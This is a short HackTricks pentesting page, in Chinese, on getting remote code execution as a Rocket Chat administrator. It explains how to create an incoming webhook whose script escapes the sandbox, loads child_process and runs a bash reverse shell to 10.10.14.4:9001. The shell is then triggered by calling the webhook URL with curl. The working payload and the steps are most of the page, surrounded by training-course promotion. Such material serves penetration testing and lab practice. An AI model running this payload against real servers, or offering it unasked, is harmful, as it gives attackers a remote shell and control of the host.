Rocket Chat

学习与实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习与实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

RCE

如果你是 Rocket Chat 的管理员,你可以获得 RCE。

  • 转到 Integrations,选择 New Integration,并选择任意:Incoming WebHookOutgoing WebHook

  • /admin/integrations/incoming

const require = console.log.constructor('return process.mainModule.require')();
const { exec } = require('child_process');
exec("bash -c 'bash -i >& /dev/tcp/10.10.14.4/9001 0>&1'")
  • 配置 WebHook(频道和以用户名发布必须存在):

  • 配置 WebHook 脚本:

  • 保存更改

  • 获取生成的 WebHook URL:

  • 使用 curl 调用它,你应该收到反向 shell

学习和实践 AWS 黑客技术:HackTricks 培训 AWS 红队专家 (ARTE) 学习和实践 GCP 黑客技术:HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

Last updated